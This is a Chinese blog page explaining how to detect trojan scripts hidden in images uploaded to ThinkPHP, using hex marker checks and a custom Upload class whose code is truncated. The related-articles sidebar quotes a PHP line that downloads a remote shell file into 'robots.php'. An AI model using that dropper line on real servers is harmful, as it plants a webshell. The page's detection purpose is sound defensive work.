thinkphp 检测上传的图片中是否含有木马脚本

最新推荐文章于 2024-07-16 11:14:25 发布
最新推荐文章于 2024-07-16 11:14:25 发布
阅读量2k 收藏 3
点赞数 1
分类专栏: 网络知识 TP3.2框架
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wang404838334/article/details/78449131
版权
该博客介绍了如何检测ThinkPHP上传的图片中是否含有木马脚本。通过分析图片十六进制代码,查找特定脚本标记来检测。文中详细阐述了制作含有木马的图片过程,并提供了一个自定义的Upload类,以实现上传时的木马检测功能。同时,作者鼓励读者亲自尝试并验证方法的有效性。
摘要由CSDN通过智能技术生成
1.检测原理

   要想检测图片中是否含有木马脚本,首先从制作原理来分析这种木马程序。这种木马程序是十六进制编码写的,图片的十六进制代码中主要包含<% ( ) %>、<? ( ) ?> 、<script | /script>, 所以我们可以通过检测十六进制代码来检测木马脚本。

 

2.解决方案

  2.1编写Upload类

   要想上传图片文件,我们要自己先定义一个上传文件的方法,然后方法中调用thinkphp中框架写好的Upload类,但是tp框架中的upload类没有检测木马图片的功能,所以我们可以自己写一个含有检测功能的upload类。

<?php
/**
  +------------------------------------------------------------------------------
* Upload 文件上传类
  +------------------------------------------------------------------------------
* @package   Upload
  +------------------------------------------------------------------------------
*/
class Upload {
      private static $image = null;
      private static $status = 0;
      private static $suffix = null;
      private static $imageType = array('.jpg', '.bmp','.gif','.png');  //允许的图片类型
      private static $message = array(  //文件上传错误信息
            '0' => '没有错误发生,文件上传成功。',
            '1' => '上传的文件超过了 php.ini 中 upload_max_filesize 选项限制的值。',
            '2' => '上传文件的大小超过了 HTML 表单中 MAX_FILE_SIZE 选项指定的值。',
            '3' => '文件只有部分被上传。',
            '4' => '没有文件上传。',
            '5' => '未能通过安全检查的文件。'
最低0.47元/天 解锁文章
wang404838334
关注
专栏目录
网站漏洞测试 关于webshell木马后门检测
网站安全资讯
11-07 862
前段时间我们SINE安全收到客户的渗透测试服务委托,在这之前,客户网站受到攻击,数据被篡改,要求我们对网站进行全面的渗透测试,包括漏洞的检测与测试,逻辑漏洞.垂直水平越权漏洞,文件上传漏洞.等等服务项目,在进行安全测试之前,我们对客户的网站大体的了解了一下,整个平台网站,包括APP,安卓端,I...
PHP检测本地图片是否木马
04-20
也可以用linux服务器上的木马扫描软件,比如 Clamav 支持命令行执行的,上传之后就扫一下,最可靠, $last_line = system('php /var/bin/clamdscan upload.jpg'); 根据扫描结果就可以判断了 $rs = checkMuma("sucaihuo.png"); $tips = array( "0" => "文件没问题", "5" => "文件有毒", "-1" => "文件没有上传" );
ThinkPHP5 被 classmap.php 文件挂马的防范与处理
最新发布
xxxPHP_er的博客
07-16 561
近期访问一个ThinkPHP5.0.24的网站,发现无论访问什么页面返回的都是一样的内容,企业微信分享链接的标题和简介也变成了灰色产业的广告信息。ThinkPHP5 被文件挂马是一个严重的安全问题,需要引起足够的重视。可通过及时更新框架版本、加强代码审计、严格权限管理等措施,可以有效防范挂马攻击。同时,在遭遇挂马事件时,需要迅速响应并采取相应的处理流程,以尽快恢复网站的正常运行。
php木马检测手机,thinkphp 检测上传图片是否含有木马脚本
weixin_33275503的博客
03-20 205
+------------------------------------------------------------------------------* Upload 文件上传类+------------------------------------------------------------------------------* @package Upload+--------...
[亲测]PHP 图片检测方法。。
weixin_34186931的博客
04-23 168
唉 通宵上项目发现一个图片检测方法在本地很快 上到服务器上检测卡死。 &lt;?php $img_exists = get_headers($pic,1); if(!empty($img_exists) &amp;&amp; $img_exists[0] =='HTTP/1.1 200 OK' &amp;&amp; $img_exists['Content...
ONETHIK上传多张图片.rar
11-29
- 对上传图片进行安全检查,防止病毒或木马文件的上传。 以上就是关于ONETHINK多图上传的详解,包括其原理、配置过程、使用步骤以及常见问题的解决。通过这个功能,开发者可以轻松地在ONETHINK项目实现丰富的...
thinkphp3.1.3 getshell_两个weblogic的漏洞的Getshell验证
weixin_39873456的博客
11-11 914
本文复现了weblogic的Weblogic CVE-2019-2725和Weblogic CVE-2017-10271两个漏洞,从批量扫描到Getshell的整个过程。主要侧重如何构造Payload去GetShell(所以扫描工具和命令执行的截图是网图),批量扫描和命令执行直接找weblogic在github的几款工具即可。在这里就不分享了,只分享payload请求代码。有问题可以留言。Webl...
网络安全---渗透测试---框架漏洞-ThinkPHP5.0、Struts2
weixin_52796034的博客
11-05 903
反弹shell(Reverse Shell)是一种计算机安全和网络攻击技术,通常被用于与远程目标系统建立命令行交互式连接。这个连接允许攻击者在远程系统上执行命令,获取系统访问权限,以及进行横向移动和数据操作。反弹shell的工作方式如下:攻击者和目标系统之间建立连接:通常,攻击者首先在目标系统上部署一个恶意程序(例如Trojan或后门),该程序会与攻击者的控制服务器建立连接。目标系统反弹连接:一旦恶意程序在目标系统上执行,它会尝试与攻击者的控制服务器建立连接。
【安全攻略】Thinkphp5.0检测上传的文件是否包含木马
美奇软件开发工作室
12-10 4290
一、要做测试,那么肯定是要准备一张带木马图片文件,制作木马图片的方法: 1、创建一个名为test.php的文件,代码: <?php copy("http://www.zy13.net/shell.txt","robots.php"); ?> test.php里的代码说明: copy(要复制的文件,复制文件的目的地); http://php.123.com/shell.txthttp://www.zy13.net/shell.txt是远程服务器里的一个txt文件,里面.
PHP检测低俗图片 -_-!
书中蠹dù鱼 {bookmoth} 的专栏
02-28 6309
其实从这个http://blog.csdn.net/lanphaday/archive/2008/10/28/3166735.aspx帖子来的。原理就是检测皮肤颜色在图片的比例。经过测试,漏掉的很少,不过误报很高。<?php/** * PHP检查低俗图片 * 作者:书蠹鱼 */if($argc == 2){ $file_name = $argv[1];
PHP判断文章是否图片,PHP如何判断图片是否伪造
weixin_30131977的博客
03-09 328
有一次把文本文件的后缀名修改为图片的后缀名,然后试着上传到qq头像上,结果报出文件格式错误的错误 显然程序只是单纯地判断文件的后缀名无法正确地判断图像的是否是真实的图像。下面给出几个方法来判断图像是否是伪造的。1.使用getimagesize()方法getimagesize() 函数用于获取图像大小及相关信息,成功返回一个数组,失败则返回 FALSE 并产生一条 E_WARNING 级的错误信...
php脚本文件类型,PHP判断上传文件类型的解决办法
weixin_29061425的博客
03-19 101
分享给大家php判断上传文件类型的方法,大家一起学习学习。/*** 读取文件前几个字节 判断文件类型* @return String*/function checkTitle($filename){$file=fopen($filename, "rb");$bin=fread($file, 2); //只读2字节fclose($file);$strInfo =@unpack("c2chars", ...
php判断图片是否可用,PHP判断图片是否损坏
weixin_31682257的博客
03-22 684
最近在整理图片生成缩略图一些图在那生成的时候提示生成失败,找到原图发现在上传的时候图片损坏了,接下来吾爱编程为大家介绍一下PHP判断图片是否损坏,有需要的小伙伴可以参考一下上面是一张损坏的图片,可以使用下面的方法判断:function damage($image){//获取图片资源$img_source = imagecreatefromjpeg($image);//获取图片的长和宽,便于获取图片...
ZH奶酪:PHP判断图片格式的7种方法
weixin_34344403的博客
06-10 293
图片 $imgurl = "http://www.php10086.com/wp-content/themes/inove/img/readers.gif"; 为例; 思路1. 把图片名当做字符串来处理,那么判断图片格式的也就是变成了查找“.”号的字符串。 方法一:strrchr() 函数查找字符串在另一个字符串最后一次出现的位置,并返回从该位置到字符串结尾的所有字符。 echo $...
违禁图片审核php,PHP利用百度ai实现文本和图片审核代码实例
weixin_39690958的博客
03-16 397
PHP利用百度ai实现文本和图片审核之前做平台内容发布审核都是自己构建一套违禁词库,在代码利用词库判断用户发布的内容,现在可以使用百度ai api完成这个功能。接下来就简单说下怎么做吧:首先打开百度ai 开发平台 注册一个账号:注册账号,进入控制台创建自己的应用,获取apikey 和秘钥进入文档页 文本审核:图像审核:文档很详细,实现用户发布内容审核 图片审核还是很方便简单的。我没有使用官方的s...
Thinkphp图片水印和文字水印
weixin_30342209的博客
02-20 441
1.Thinkphp图像处理   在TP框架,我们经常用到图片上传,我最近写了很多关于图片上传的文章,thinkphp图片上传+validate表单验证+图片木马检测+缩略图生成等文章,今天写一下关于图片上传成功后给图片加水印文字或者加图片水印,      1.1图片处理类和库   首先,在Thinkphp\Think\Image类有图像处理功能,支持Gd库和Imagick库,包括对G...
ThinkPHP图片上传教程:步骤详解与配置
总结起来,要在ThinkPHP实现图片上传功能,你需要创建数据库表、配置文件,定义控制器和视图,并编写上传逻辑。ThinkPHP提供的UploadFile类大大简化了这个过程,但具体实现细节取决于你的需求和安全策略。记得在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值